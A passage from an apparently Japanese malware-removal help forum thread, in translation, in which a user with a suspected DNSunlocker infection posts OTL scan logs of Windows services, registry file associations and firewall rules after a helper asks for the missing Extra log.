[2014/04/01 21:31:51 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn
[2014/05/06 04:02:09 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn1
[2015/06/16 21:11:40 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn2
[2015/07/08 21:48:36 | 000,000,000 | RH-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Windows\Burn\Burn3
[2015/06/10 15:43:46 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame
[2015/06/10 15:43:45 | 000,565,248 | -H-- | M] (NHN Japan Corp.) -- C:\Users\kaito\AppData\Roaming\Hangame\hgstarterjp.exe
[2015/06/10 17:50:08 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Hangame\HUL
[2014/04/16 23:21:26 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
[2015/06/10 15:28:53 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\IETldCache\Low
[2015/09/14 16:41:09 | 000,000,000 | RH-D | M] -- C:\Users\Public\Desktop
[2009/07/14 11:34:59 | 000,000,000 | RH-D | M] -- C:\Users\Public\Favorites
[2014/04/13 00:58:19 | 000,000,000 | RH-D | M] -- C:\Users\Public\Libraries
[2014/12/19 17:25:39 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\LocalService\AppData
[2014/04/02 21:12:09 | 000,000,000 | -H-D | M] -- C:\Windows\ServiceProfiles\NetworkService\AppData

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/09/14 17:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/14 00:02:00 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/14 17:02:00 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/14 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/14 16:48:05 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000LPVX-22V0TT0
Partitions: 3
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 18.00GB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: Installable File System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 19328401408
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 448.00GB
Starting Offset: 19433259008
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2015/03/04 13:41:26 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2013/02/27 14:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2009/07/14 10:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/14 10:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2012/07/05 07:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:56 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2015/02/03 12:12:14 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/21 12:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2011/07/14 16:24:58 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/14 10:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/14 10:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 13:17:27 | 000,303,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2011/09/21 20:51:57 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2012/02/11 15:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2015/05/26 03:18:19 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/21 12:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2010/11/21 12:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/21 12:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/19 12:06:55 | 000,210,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2010/11/21 12:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
No service found with a name of WinDefend
SRV:[b]64bit:[/b] - [2010/11/21 12:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/21 12:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/25 12:24:41 | 002,553,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:[/b] - [2010/11/21 12:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]

< End of report >

That is all.
  • あすとろ
  • 2015/09/15 (Tue) 12:01:42
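Wasn't an Extra log produced?
Good evening.
IVNO seems to be busy tonight, so I will reply instead.

I have looked at the OTL scan log. OTL.txt is fine, but wasn't the other log, Extra.txt, produced as well?
Please search for that log too, just in case, and if you find it, post its contents in a follow-up reply.

If you cannot find it after searching, just reply to say so.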
  • 悪代官
  • 2015/09/15 (Tue) 20:36:40
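Re: DNSunlocker infection
Good evening.

>IVNO seems to be busy tonight, so I will reply instead.
Thank you for your continued help.

My apologies once again. The scan I ran on the 12th did produce an Extra log, but I completely forgot to post it.

For the scan I ran yesterday, a file search did not turn it up, so I believe there is no Extra log for yesterday's scan.

The Extra log follows.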


OTL Extras logfile created on: 2015/09/12 16:51:59 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\【ユーザー名】\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.84 Gb Total Physical Memory | 2.76 Gb Available Physical Memory | 71.85% Memory free
7.68 Gb Paging File | 6.02 Gb Available in Paging File | 78.39% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 447.66 Gb Total Space | 112.59 Gb Free Space | 25.15% Space Free | Partition Type: NTFS

Computer Name: 【ユーザー名】 | User Name: 【ユーザー名】 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

[color=#E56717]========== Shell Spawning ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [FindArchive] -- C:\Program Files\Explzh\Explzh.exe /f %1 (pon software)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- Reg Error: Key error.
https [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [FindArchive] -- C:\Program Files\Explzh\Explzh.exe /f %1 (pon software)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

[color=#E56717]========== Security Center Settings ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

[color=#E56717]========== Firewall Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0

[color=#E56717]========== Authorized Applications List ==========[/color]


[color=#E56717]========== Vista Active Open Ports Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{07C7561D-2F98-4B2F-A818-6B5BF1470074}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{0F51752C-EE36-4433-9E6A-930D1E3E807F}" = lport=137 | protocol=17 | dir=in | app=system |
"{10A7FC14-49FB-48C2-9B54-187EB843EBBD}" = rport=139 | protocol=6 | dir=out | app=system |
"{12A60B3D-38AB-4B26-B6D7-BBA48B38234F}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{146FD676-76C0-46EF-9BA5-9BA1197D7FB5}" = lport=54045 | protocol=17 | dir=in | app=c:\program files\logicool gaming software\lcore.exe |
"{1BF9D083-497A-41AD-AF89-7E0E23457E0C}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{1C3459E1-CF46-4112-A65F-8FD5572775CF}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{1F00F6DB-808D-48CC-B035-CD4F3EBFD1A4}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{32EAAA51-6197-497D-8B2E-727F474D2830}" = rport=138 | protocol=17 | dir=out | app=system |
"{33E9EDED-CD1F-46EB-81BA-1D3087A99A4D}" = lport=2869 | protocol=6 | dir=in | app=system |
"{340DFD9C-4D9D-4B86-9C50-3C0E2FD14D0F}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{3B4FAD47-2B86-4B8D-BA22-221823059342}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{3B987445-48E3-4BE8-BFFA-65C92C4BEFA5}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{4926F38B-2BA5-4D73-A13D-36A282F3E377}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{54BE1F33-A751-41A8-AF78-A45A44A20A1B}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{5C6C3EED-262E-4748-BAB2-A06CD7484410}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |
"{5DCDF5B3-37C6-40FA-81BE-1387684598B1}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{620DA419-2143-4ED5-A47F-03D2ED91062A}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{7B9F4087-4270-406B-8988-3533D271781A}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{7EDE44CE-6267-4D4A-8FA3-D84006221026}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{84FA516B-C8B6-4E58-8E01-D7AAFA024571}" = lport=10243 | protocol=6 | dir=in | app=system |
"{8C14F673-CCB4-4D17-AF33-A12E05A7CA32}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{8E857F88-07D3-4346-AC52-58C7E42178A1}" = lport=138 | protocol=17 | dir=in | app=system |
"{92E0D575-E5F5-4147-BDB6-70A4607CF8E1}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{940E5143-47AB-4273-BADE-5F826816312B}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{A68DC19E-3B4A-4157-8FB7-EB2D7DD668A8}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{B6D392CD-E978-4A17-9367-AE242536921C}" = rport=137 | protocol=17 | dir=out | app=system |
"{B97C6C74-1CDD-41B8-A642-57ACC5394C1D}" = lport=139 | protocol=6 | dir=in | app=system |
"{B9C0DA78-35BA-464C-B4BE-21615091FBE0}" = lport=445 | protocol=6 | dir=in | app=system |
"{BEFE078D-4CA2-44FB-B48F-6C24D39D3C44}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{C969587D-3177-44BE-B3D2-016CD884344A}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{DE99D120-72BC-4861-B01D-6D3734A1E734}" = lport=5353 | protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\local\vivaldi\application\vivaldi.exe |
"{E31C6882-A62F-4ECB-85BD-CFB546EDDE0D}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{E4C0DABB-FAD2-40E2-A0E8-B7BAA9964A27}" = rport=445 | protocol=6 | dir=out | app=system |
"{E50D4D0F-DB86-469C-8A3F-ECB108058CE8}" = rport=10243 | protocol=6 | dir=out | app=system |
"{EC66A11C-D318-4164-B18B-DBB025C6C5CD}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

[color=#E56717]========== Vista Active Application Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{000CB540-A21D-4547-8D93-B871C48BE9C0}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\clear.fi media\dmcdaemon.exe |
"{0202719B-3613-496C-8978-C39571FC76CE}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\clear.fi photo\windowsupnp.exe |
"{0416A1F9-B971-43D4-A3C1-381D4EF16981}" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{048A6865-A8D0-4636-B510-06C6924F6825}" = dir=in | app=c:\program files (x86)\janetter2\bin\janettersrv.exe |
"{0609FAA2-FB33-4EA7-B2BB-5160F72D305A}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{09072A48-31BA-4112-8252-2C4C39B21F97}" = dir=in | app=c:\program files (x86)\windows live\mesh\moe.exe |
"{0AC0E324-F097-4618-80A6-B13DA2C36746}" = protocol=17 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"{0BB34C3B-0980-4D3A-B76F-F316D3C3E715}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead 2\left4dead2.exe |
"{0BFEFFAD-6F4A-4807-9C39-A2668332A151}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{0C4C931E-86FD-4D3F-B4A1-22EFCDBB5F99}" = protocol=6 | dir=in | app=c:\program files (x86)\origin games\peggle deluxe\peggle.exe |
"{17EC8CAA-28F1-46FF-ACF7-CF8517D1666B}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe |
"{19986BB5-D8F7-46AD-8DAF-7402D3294655}" = protocol=6 | dir=in | app=c:\program files (x86)\origin games\plants vs. zombies\plantsvszombies.exe |
"{1E168288-A312-45C9-A45C-68E71183FA85}" = protocol=6 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
